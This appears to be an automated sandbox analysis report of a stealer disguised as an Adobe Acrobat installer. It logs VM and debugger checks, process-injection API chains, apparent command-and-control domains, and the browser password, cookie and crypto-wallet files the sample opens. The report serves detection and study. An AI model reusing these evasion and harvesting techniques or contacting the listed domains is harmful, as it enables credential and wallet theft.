Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Memory allocated: 6E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Memory allocated: 2530000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Memory allocated: 820000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe

Window / User API: threadDelayed 6458

Jump to behavior

Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe TID: 3220	Thread sleep time: -150000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe TID: 6192	Thread sleep count: 6458 > 30			Jump to behavior

Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: Amcache.hve.5.dr	Binary or memory string: VMware
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.5.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.5.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.5.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Adobe-Acrobat-Pro-2025.exe, 00000001.00000002.3418506061.0000000000F4A000.00000004.00000020.00020000.00000000.sdmp, Adobe-Acrobat-Pro-2025.exe, 00000001.00000002.3418407538.0000000000F0C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.5.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.5.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.5.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.5.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.5.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.5.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.5.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe

API call chain: ExitProcess graph end node

graph_1-13393

Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe

Code function: 1_2_0043F280 LdrInitializeThunk,

1_2_0043F280

Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 0_2_02537FDD mov edi, dword ptr fs:[00000030h]		0_2_02537FDD
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Code function: 0_2_0253815A mov edi, dword ptr fs:[00000030h]		0_2_0253815A

Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe

Code function: 0_2_02537FDD GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_02537FDD

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe

Memory written: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: Adobe-Acrobat-Pro-2025.exe, 00000000.00000002.2332336407.0000000003539000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: growthselec.bond
Source: Adobe-Acrobat-Pro-2025.exe, 00000000.00000002.2332336407.0000000003539000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: immolatechallen.bond
Source: Adobe-Acrobat-Pro-2025.exe, 00000000.00000002.2332336407.0000000003539000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: crookedfoshe.bond
Source: Adobe-Acrobat-Pro-2025.exe, 00000000.00000002.2332336407.0000000003539000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: strivehelpeu.bond
Source: Adobe-Acrobat-Pro-2025.exe, 00000000.00000002.2332336407.0000000003539000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: sobrattyeu.bond

Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe

Process created: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe "C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Queries volume information: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.5.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: Adobe-Acrobat-Pro-2025.exe PID: 2316, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: Adobe-Acrobat-Pro-2025.exe, type: SAMPLE
Source: Yara match	File source: 0.0.Adobe-Acrobat-Pro-2025.exe.10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Adobe-Acrobat-Pro-2025.exe.3539550.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Adobe-Acrobat-Pro-2025.exe.3539550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2170361115.0000000000012000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2332336407.0000000003539000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Adobe-Acrobat-Pro-2025.exe, 00000001.00000002.3418506061.0000000000F4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum
Source: Adobe-Acrobat-Pro-2025.exe, 00000001.00000002.3418506061.0000000000F4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: Adobe-Acrobat-Pro-2025.exe, 00000001.00000002.3418697582.0000000000F98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "},{"en":"cjelfplplebdjjenllpjcblmjkfcffne","ez":"Jaxx Liberty"},{"en":"fihkp
Source: Adobe-Acrobat-Pro-2025.exe, 00000001.00000002.3418506061.0000000000F4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: Adobe-Acrobat-Pro-2025.exe, 00000001.00000002.3418506061.0000000000F4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3
Source: Adobe-Acrobat-Pro-2025.exe, 00000001.00000002.3418506061.0000000000F4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: Adobe-Acrobat-Pro-2025.exe, 00000000.00000002.2332336407.0000000003539000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: set_UseMachineKeyStore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Adobe-Acrobat-Pro-2025.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
